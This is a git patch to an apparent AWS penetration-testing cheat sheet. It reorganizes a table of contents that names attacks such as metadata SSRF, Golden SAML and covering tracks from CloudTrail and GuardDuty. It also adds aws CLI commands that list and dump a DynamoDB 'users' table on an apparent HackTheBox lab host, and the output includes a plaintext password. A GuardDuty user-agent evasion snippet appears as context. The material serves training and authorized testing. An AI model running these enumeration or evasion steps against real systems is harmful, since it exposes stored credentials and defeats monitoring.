From a4bdabea83e7efee39fd75dbeba19944fae0a79f Mon Sep 17 00:00:00 2001
From: soka <romain.dereydellet@gmail.com>
Date: Fri, 30 Apr 2021 21:44:21 +0200
Subject: [PATCH] Add AWS DynamoDB enumeration

---
 .../Cloud - AWS Pentest.md                    | 76 +++++++++++++------
 1 file changed, 53 insertions(+), 23 deletions(-)

diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md
index e20e269..d29242c 100644
--- a/Methodology and Resources/Cloud - AWS Pentest.md	
+++ b/Methodology and Resources/Cloud - AWS Pentest.md	
@@ -4,29 +4,31 @@
 
 ## Summary
 
-* [Training](#training)
-* [Tools](#tools)
-* [AWS - Patterns](#aws---patterns)
-* [AWS - Metadata SSRF](#aws---metadata-ssrf)
-  * [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2)
-  * [Method for Container Service (Fargate)](#method-for-container-service-fargate)
-  * [AWS API calls that return credentials](#aws-api-calls-that-return-credentials)
-* [AWS - Shadow Admin](#aws---shadow-admin)
-  * [Admin equivalent permission](#admin-equivalent-permission)
-* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
-* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
-* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
-* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
-* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
-* [AWS - SSM - Command execution](#aws---ssm---command-execution)
-* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
-* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
-* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
-  * [PenTest:IAMUser/KaliLinux](#)
-  * [PenTest:IAMUser/ParrotLinux](#)
-  * [PenTest:IAMUser/PentooLinux](#)
-* [Security checks](#security-checks)
-* [References](#references)
+- [AWS](#aws)
+  - [Summary](#summary)
+  - [Training](#training)
+  - [Tools](#tools)
+  - [AWS Patterns](#aws-patterns)
+  - [AWS - Metadata SSRF](#aws---metadata-ssrf)
+    - [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2)
+    - [Method for Container Service (Fargate)](#method-for-container-service-fargate)
+    - [AWS API calls that return credentials](#aws-api-calls-that-return-credentials)
+  - [AWS - Shadow Admin](#aws---shadow-admin)
+    - [Admin equivalent permission](#admin-equivalent-permission)
+  - [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
+  - [AWS - Enumerate IAM permissions](#aws---enumerate-iam-permissions)
+  - [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
+  - [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
+  - [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
+  - [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
+  - [AWS - SSM - Command execution](#aws---ssm---command-execution)
+  - [AWS - Golden SAML Attack](#aws---golden-saml-attack)
+  - [AWS - Shadow Copy attack](#aws---shadow-copy-attack)
+  - [Disable CloudTrail](#disable-cloudtrail)
+  - [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
+  - [DynamoDB](#dynamodb)
+  - [Security checks](#security-checks)
+  - [References](#references)
 
 ## Training
 
@@ -605,6 +607,34 @@ if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower():  #
     self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
 ```
 
+## DynamoDB
+> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second.
+
+* list tables
+```bash
+$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables        
+
+{
+    "TableNames": [
+        "users"
+    ]
+}
+```
+
+* enumerate table content
+```bash
+$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'
+
+{
+  "password": {
+    "S": "Management@#1@#"
+  },
+  "username": {
+    "S": "Mgmt"
+  }
+}
+```
+
 ## Security checks
 
 https://github.com/DenizParlak/Zeus